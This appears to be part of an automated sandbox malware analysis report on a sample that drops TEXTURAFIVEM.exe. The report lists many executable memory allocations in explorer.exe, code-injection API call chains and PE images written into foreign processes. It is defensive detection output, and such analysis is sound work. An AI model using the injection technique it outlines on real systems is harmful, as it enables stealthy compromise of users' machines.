            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5170000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5180000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5190000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 51A0000 protect: page execute and read and write
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 51B0000 protect: page execute and read and write
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 51C0000 protect: page execute and read and write
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 51D0000 protect: page execute and read and write
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 51E0000 protect: page execute and read and write
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 5270000 protect: page execute and read and write
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 5280000 protect: page execute and read and write
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 5290000 protect: page execute and read and write
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 52A0000 protect: page execute and read and write
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 52B0000 protect: page execute and read and write
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 52C0000 protect: page execute and read and write
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 52D0000 protect: page execute and read and write
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 52E0000 protect: page execute and read and write
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 5370000 protect: page execute and read and write
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 5380000 protect: page execute and read and write
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 5390000 protect: page execute and read and write
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 53A0000 protect: page execute and read and write
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 53B0000 protect: page execute and read and write
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 53C0000 protect: page execute and read and write
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 53D0000 protect: page execute and read and write
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 53E0000 protect: page execute and read and write
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 5470000 protect: page execute and read and write
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 5480000 protect: page execute and read and write
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 5490000 protect: page execute and read and write
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 54A0000 protect: page execute and read and write
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 54B0000 protect: page execute and read and write
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 54C0000 protect: page execute and read and write
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 54D0000 protect: page execute and read and write
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 54E0000 protect: page execute and read and write
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 5570000 protect: page execute and read and write
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 5580000 protect: page execute and read and write
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 5590000 protect: page execute and read and write
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 55A0000 protect: page execute and read and write
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 55B0000 protect: page execute and read and write
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 55C0000 protect: page execute and read and write
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 55D0000 protect: page execute and read and write
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 55E0000 protect: page execute and read and write
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 5670000 protect: page execute and read and write
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 5680000 protect: page execute and read and write
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 5690000 protect: page execute and read and write
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 56A0000 protect: page execute and read and write
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 56B0000 protect: page execute and read and write
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 56C0000 protect: page execute and read and write
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 56D0000 protect: page execute and read and write
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 56E0000 protect: page execute and read and write
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 5770000 protect: page execute and read and write
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 5780000 protect: page execute and read and write
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 5790000 protect: page execute and read and write
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 57A0000 protect: page execute and read and write
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 57B0000 protect: page execute and read and write
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 57C0000 protect: page execute and read and write
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 57D0000 protect: page execute and read and write
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 57E0000 protect: page execute and read and write
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 5870000 protect: page execute and read and write
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 5880000 protect: page execute and read and write
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 5890000 protect: page execute and read and write
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 58A0000 protect: page execute and read and write
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 58B0000 protect: page execute and read and write
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 58C0000 protect: page execute and read and write
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 58D0000 protect: page execute and read and write
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 58E0000 protect: page execute and read and write
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 5970000 protect: page execute and read and write
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 5980000 protect: page execute and read and write
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 5990000 protect: page execute and read and write
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 59A0000 protect: page execute and read and write
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 59B0000 protect: page execute and read and write
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 59C0000 protect: page execute and read and write
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 59D0000 protect: page execute and read and write
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 59E0000 protect: page execute and read and write
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 5A70000 protect: page execute and read and write
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 5A80000 protect: page execute and read and write
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 24010000 protect: page execute and read and write
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 32D0000 protect: page execute and read and write
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 32E0000 protect: page execute and read and write
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 32F0000 protect: page execute and read and write
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 3380000 protect: page execute and read and write
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 3390000 protect: page execute and read and write
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 33A0000 protect: page execute and read and write
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 33B0000 protect: page execute and read and write
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 33C0000 protect: page execute and read and write
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 33D0000 protect: page execute and read and write
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 33E0000 protect: page execute and read and write
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 33F0000 protect: page execute and read and write
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 3600000 protect: page execute and read and write
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 3610000 protect: page execute and read and write
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 3620000 protect: page execute and read and write
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 3630000 protect: page execute and read and write
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 3A20000 protect: page execute and read and write
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 3A30000 protect: page execute and read and write
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 3A40000 protect: page execute and read and write
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 3A50000 protect: page execute and read and write
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 3A60000 protect: page execute and read and write
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 3A70000 protect: page execute and read and write
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 3A80000 protect: page execute and read and write
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 3A90000 protect: page execute and read and write
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 3AA0000 protect: page execute and read and write
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 3AB0000 protect: page execute and read and write
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 3AC0000 protect: page execute and read and write
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 3AD0000 protect: page execute and read and write
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 3AE0000 protect: page execute and read and write
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 3AF0000 protect: page execute and read and write
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 3B00000 protect: page execute and read and write
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 3B10000 protect: page execute and read and write
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 3B20000 protect: page execute and read and write
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 3B30000 protect: page execute and read and write
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 3B40000 protect: page execute and read and write
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 3B50000 protect: page execute and read and write
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 5310000 protect: page execute and read and write
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 5320000 protect: page execute and read and write
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 5360000 protect: page execute and read and write
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 5370000 protect: page execute and read and write
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 5380000 protect: page execute and read and write
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 5390000 protect: page execute and read and write
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 53A0000 protect: page execute and read and write
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 53B0000 protect: page execute and read and write
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 53C0000 protect: page execute and read and write
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 5450000 protect: page execute and read and write
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 5460000 protect: page execute and read and write
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 5470000 protect: page execute and read and write
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 5480000 protect: page execute and read and write
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 54A0000 protect: page execute and read and write
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 54B0000 protect: page execute and read and write
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 54C0000 protect: page execute and read and write
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 54D0000 protect: page execute and read and write
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 5560000 protect: page execute and read and write
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 5570000 protect: page execute and read and write
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 5580000 protect: page execute and read and write
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 5590000 protect: page execute and read and write
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 55A0000 protect: page execute and read and write
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 55B0000 protect: page execute and read and write
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 55C0000 protect: page execute and read and write
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 55D0000 protect: page execute and read and write
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 5660000 protect: page execute and read and write
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 5670000 protect: page execute and read and write
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 5680000 protect: page execute and read and write
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 5690000 protect: page execute and read and write
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 56A0000 protect: page execute and read and write
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 56B0000 protect: page execute and read and write
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 56C0000 protect: page execute and read and write
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 56D0000 protect: page execute and read and write
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 5760000 protect: page execute and read and write
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 5770000 protect: page execute and read and write
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 5780000 protect: page execute and read and write
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 5790000 protect: page execute and read and write
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 57A0000 protect: page execute and read and write
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 57B0000 protect: page execute and read and write
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 57C0000 protect: page execute and read and write
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 57D0000 protect: page execute and read and write
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 5860000 protect: page execute and read and write
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 5870000 protect: page execute and read and write
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 5880000 protect: page execute and read and write
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 5890000 protect: page execute and read and write
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 58A0000 protect: page execute and read and write
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 58B0000 protect: page execute and read and write
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 58C0000 protect: page execute and read and write
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 58D0000 protect: page execute and read and write
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 5960000 protect: page execute and read and write
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 5970000 protect: page execute and read and write
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 5980000 protect: page execute and read and write
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 5990000 protect: page execute and read and write
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 59A0000 protect: page execute and read and write
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 59B0000 protect: page execute and read and write
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 59C0000 protect: page execute and read and write
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 59D0000 protect: page execute and read and write
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 5A60000 protect: page execute and read and write
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 5A70000 protect: page execute and read and write
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 5A80000 protect: page execute and read and write
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 5A90000 protect: page execute and read and write
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 5AA0000 protect: page execute and read and write
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 5AB0000 protect: page execute and read and write
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 5AC0000 protect: page execute and read and write
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 5AD0000 protect: page execute and read and write
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 5B60000 protect: page execute and read and write
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 5B70000 protect: page execute and read and write
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 5B80000 protect: page execute and read and write
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 5B90000 protect: page execute and read and write
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 5BA0000 protect: page execute and read and write
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 5BB0000 protect: page execute and read and write
            Contains functionality to inject code into remote processes
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 20_2_24054984 CreateProcessA,GetThreadContext,ReadProcessMemory,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,VirtualProtectEx,WriteProcessMemory,SetThreadContext,TerminateProcess,ResumeThread
            Contains functionality to inject threads in other processes
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Code function: 1_2_0040AF08 GetModuleHandleA,VirtualFreeEx,VirtualAllocEx,GetModuleHandleA,WriteProcessMemory,CreateRemoteThread,CloseHandle
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Code function: 4_2_0040AF08 GetModuleHandleA,VirtualFreeEx,VirtualAllocEx,GetModuleHandleA,WriteProcessMemory,CreateRemoteThread,CloseHandle
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Code function: 5_2_0040AF08 GetModuleHandleA,VirtualFreeEx,VirtualAllocEx,GetModuleHandleA,WriteProcessMemory,CreateRemoteThread,CloseHandle
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Code function: 9_2_0040AF08 GetModuleHandleA,VirtualFreeEx,VirtualAllocEx,GetModuleHandleA,WriteProcessMemory,CreateRemoteThread,CloseHandle
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 20_2_2403B354 GetModuleHandleA,VirtualFreeEx,VirtualAllocEx,GetModuleHandleA,WriteProcessMemory,CreateRemoteThread,CloseHandle
            Creates a thread in another existing process (thread injection)
            Injects a PE file into foreign processes
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe, Memory written: C:\Windows\explorer.exe base: 24010000 value starts with: 4D5A
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe, Memory written: C:\Windows\SysWOW64\explorer.exe base: 24080000 value starts with: 4D5A
            Source: C:\Windows\install\TEXTURAFIVEM.exe, Memory written: unknown base: 24080000 value starts with: 4D5A
            Source: C:\Windows\install\TEXTURAFIVEM.exe, Memory written: C:\Windows\SysWOW64\explorer.exe base: 24010000 value starts with: 4D5A
            Source: C:\Windows\install\TEXTURAFIVEM.exe, Memory written: unknown base: 240F0000 value starts with: 4D5A
            Source: C:\Windows\install\TEXTURAFIVEM.exe, Memory written: C:\Windows\SysWOW64\explorer.exe base: 24010000 value starts with: 4D5A
            Source: C:\Windows\install\TEXTURAFIVEM.exe, Memory written: unknown base: 24160000 value starts with: 4D5A
            Source: C:\Windows\install\TEXTURAFIVEM.exe, Memory written: C:\Windows\SysWOW64\explorer.exe base: 24010000 value starts with: 4D5A
            Injects code into the Windows Explorer (explorer.exe)
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 3440 base: 4EC0000 value: 55Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 3440 base: 7230000 value: 77Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 3440 base: 7260000 value: 77Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 3440 base: 7290000 value: 90Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 3440 base: 72C0000 value: 55Jump to behavior
